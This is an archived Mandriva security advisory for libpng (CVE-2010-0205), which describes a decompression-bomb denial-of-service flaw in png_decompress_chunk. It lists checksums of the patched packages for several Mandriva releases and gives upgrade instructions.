lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <E1Nu3fJ-00050h-3O@titan.mandriva.com>
Date: Tue, 23 Mar 2010 13:57:00 +0100
From: security@...driva.com
To: full-disclosure@...ts.grok.org.uk
Subject: [ MDVSA-2010:064 ] libpng


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:064
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libpng
 Date    : March 23, 2010
 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been found and corrected in libpng:
 
 The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before
 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly
 handle compressed ancillary-chunk data that has a disproportionately
 large uncompressed representation, which allows remote attackers to
 cause a denial of service (memory and CPU consumption, and application
 hang) via a crafted PNG file, as demonstrated by use of the deflate
 compression method on data composed of many occurrences of the same
 character, related to a decompression bomb attack (CVE-2010-0205).
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 e0f5c5c179b1224d99f6b16b718069b1  2009.0/i586/libpng3-1.2.31-2.2mdv2009.0.i586.rpm
 5e5e6ec06e5d5997d82b1780c6e364e1  2009.0/i586/libpng-devel-1.2.31-2.2mdv2009.0.i586.rpm
 48c2108e471923710e8ac01d7984df3a  2009.0/i586/libpng-source-1.2.31-2.2mdv2009.0.i586.rpm
 24e60615f07e3310091b96db44821b55  2009.0/i586/libpng-static-devel-1.2.31-2.2mdv2009.0.i586.rpm 
 148ad37542ef79c0ed97be519be0478d  2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 0a76c1bbd16c3ff1e23027aeba6dbb70  2009.0/x86_64/lib64png3-1.2.31-2.2mdv2009.0.x86_64.rpm
 8e01630ee7eb85327dc226632b535ffd  2009.0/x86_64/lib64png-devel-1.2.31-2.2mdv2009.0.x86_64.rpm
 ed2d30ab62de27e52052fc2bd5958540  2009.0/x86_64/lib64png-static-devel-1.2.31-2.2mdv2009.0.x86_64.rpm
 363e0b340727539dab6765b89660fb43  2009.0/x86_64/libpng-source-1.2.31-2.2mdv2009.0.x86_64.rpm 
 148ad37542ef79c0ed97be519be0478d  2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 eb835d104959137d6ca68071e8f55fc6  2009.1/i586/libpng3-1.2.35-1.1mdv2009.1.i586.rpm
 c0154024cdcfa2d9fb221e2f4483546c  2009.1/i586/libpng-devel-1.2.35-1.1mdv2009.1.i586.rpm
 22ec75a046bd10bfa69afa223e651357  2009.1/i586/libpng-source-1.2.35-1.1mdv2009.1.i586.rpm
 2ddcfacf2b6dfa6bf873ffb49bbec43e  2009.1/i586/libpng-static-devel-1.2.35-1.1mdv2009.1.i586.rpm 
 d28bd0a3c425381e441c0c1d4202ee3d  2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 c9eec8bdd1b1a2aea33a9e5f8dfdc05e  2009.1/x86_64/lib64png3-1.2.35-1.1mdv2009.1.x86_64.rpm
 36436b03497287eefe7011cfc4b69ab5  2009.1/x86_64/lib64png-devel-1.2.35-1.1mdv2009.1.x86_64.rpm
 810be607e4dcc0c1e6157dd0281b3122  2009.1/x86_64/lib64png-static-devel-1.2.35-1.1mdv2009.1.x86_64.rpm
 948e22de64093275c10dbd781cde02ed  2009.1/x86_64/libpng-source-1.2.35-1.1mdv2009.1.x86_64.rpm 
 d28bd0a3c425381e441c0c1d4202ee3d  2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 50a03f5191cc9383c09ef152fa6ebb8c  2010.0/i586/libpng3-1.2.40-1.1mdv2010.0.i586.rpm
 6a528114a5d5cf86c684a179f5ee36b8  2010.0/i586/libpng-devel-1.2.40-1.1mdv2010.0.i586.rpm
 9a1154491d80af5ced9a02e37947bf2c  2010.0/i586/libpng-source-1.2.40-1.1mdv2010.0.i586.rpm
 fb0671ad70f8202f32c7566d08070a8c  2010.0/i586/libpng-static-devel-1.2.40-1.1mdv2010.0.i586.rpm 
 5911cb03cac15875905c17214463ab65  2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 08e10e44a82ca8df8c6586bf07d3b6ce  2010.0/x86_64/lib64png3-1.2.40-1.1mdv2010.0.x86_64.rpm
 224425aa77a35bd3233c89613562fe7e  2010.0/x86_64/lib64png-devel-1.2.40-1.1mdv2010.0.x86_64.rpm
 2682dae8ecdb43af20aadea093d3f03d  2010.0/x86_64/lib64png-static-devel-1.2.40-1.1mdv2010.0.x86_64.rpm
 be6b483916a098489e41d13bf2f98d63  2010.0/x86_64/libpng-source-1.2.40-1.1mdv2010.0.x86_64.rpm 
 5911cb03cac15875905c17214463ab65  2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm

 Mandriva Enterprise Server 5:
 cb7196e7825b553e2414b76e236abf36  mes5/i586/libpng3-1.2.31-2.2mdvmes5.i586.rpm
 909211c1ac708b89b790e75261ac27b4  mes5/i586/libpng-devel-1.2.31-2.2mdvmes5.i586.rpm
 5216e2e783fee0043ccf34c84db096fd  mes5/i586/libpng-source-1.2.31-2.2mdvmes5.i586.rpm
 321d36768502ddfb1b90086b6204a670  mes5/i586/libpng-static-devel-1.2.31-2.2mdvmes5.i586.rpm 
 b2e5c72d1cc33ec0e53b36a590cafa35  mes5/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 457da1eac0895ee795e2076d46e723d6  mes5/x86_64/lib64png3-1.2.31-2.2mdvmes5.x86_64.rpm
 80a132428cc6638972263f7f92fef9da  mes5/x86_64/lib64png-devel-1.2.31-2.2mdvmes5.x86_64.rpm
 34bea6af1ef00ce04c3f842e6b5fc112  mes5/x86_64/lib64png-static-devel-1.2.31-2.2mdvmes5.x86_64.rpm
 a89184a0f83c9bc3b295909a174e66d1  mes5/x86_64/libpng-source-1.2.31-2.2mdvmes5.x86_64.rpm 
 b2e5c72d1cc33ec0e53b36a590cafa35  mes5/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLqIx9mqjQ0CJFipgRAjwEAJ9esE4PRdBb1EyE3TaH1wOwo+7isgCgoj4l
HzHGWDCDi+o3C9YelfNCJ8s=
=l5qb
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ